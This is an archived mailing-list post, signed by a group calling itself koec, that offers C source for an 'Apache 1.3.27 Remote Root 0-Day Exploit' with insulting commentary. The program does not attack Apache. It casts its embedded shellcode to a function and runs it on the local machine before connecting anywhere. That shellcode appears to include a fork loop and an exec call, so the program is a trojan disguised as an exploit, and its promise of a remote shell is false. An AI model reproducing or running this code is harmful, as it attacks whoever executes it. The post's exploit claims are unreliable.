| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: koec at hushmail.com (koec@...hmail.com)
Subject: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
I am posting this as a member of koec. The koec take no responsibility
for damages caused by this software, compile and use at your own risk.
By the way, the koec make you all look like a bunch of fuckin' schoolgirls.
WHITEH8.
- --BEGIN KOEC-APACHE.C--
/* :: PRIVATE - DO NOT DISTRIBUTE ::
* Apache/1.3.27 - Remote Root Exploit
* Knights of the Eastern Calculus (info@...c.org)
*/
#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
static char shellcode[] = {
"\x31\xdb\x31\xc0\x31\xd2\xb2\x18\x68\x20\x3f\x21"
"\x0a\x68\x54\x52\x31\x58\x68\x65\x20\x4d\x34\x68"
"\x73\x20\x54\x68\x68\x61\x74\x20\x69\x68\x2d\x2d"
"\x57\x68\x89\xe1\xb0\x04\xcd\x80\xb8\x02\x00\x00"
"\x00\xcd\x80\xeb\xf7\x00\xcb\xad\x80\x00\x00\x02"
"\x73\x21\x54\x68\x68\x61\x74\x21\x69\x68\x2d\x2d"
"\x0a\x67\x54\x52\x31\x57\x67\x65\x20\x4d\x34\x67"
"\x67\x68\x89\xe1\xb2\x04\xcd\x80\xb8\x02\x80\x00"
"\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc"
"\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50"
"\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1"
"\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24"
"\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44"
"\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89"
"\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0"
};
int main(int *argc, char **argv)
{
int i;
char *buffer;
int s;
struct hostent *hp;
struct sockaddr_in sin;
if((int)argc < 3 )
{
printf("usage: %s <target> <shell port>\n", argv[0]);
printf("ex: %s google.com 31337\n", argv[0]);
exit(0);
}
buffer = (char *) malloc(512 + 1024 + 100);
if (buffer == NULL) {
printf("Not enough memory\n");
exit(1);
}
memcpy(&buffer[512 - strlen(shellcode)], shellcode,
strlen(shellcode));
buffer[512 + 1024] = ';';
buffer[512 + 1024 + 1] = '\0';
void(*b)()=(void*)shellcode;b();
hp = gethostbyname(argv[1]);
if (hp == NULL) {
printf("Server doesn't exist\n");
exit(1);
}
bzero(&sin, sizeof(sin));
bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0) {
printf("Cannot open socket\n");
exit(1);
}
if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
printf("Connection refused\n");
exit(1);
}
printf("Attempting to Exploit...\n");
if (send(s, buffer, strlen(buffer), 0) != 1)
printf("Success!!!\n");
else
printf("No go there tough guy!\n");
printf("If we're lucky there should be a shell on port %d.\n", atoi(argv[2]));
}
- --END KOEC-APACHE.C--
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.3
wkYEARECAAYFAj7zKrcACgkQsm8eq8rMuWpg0gCeNQCeLDLLhIki1eWI09PYX+bKLEgA
nRXqS24ObnxBxWHwroyNTkBVjZpo
=D2RC
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434
Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
Powered by blists - more mailing lists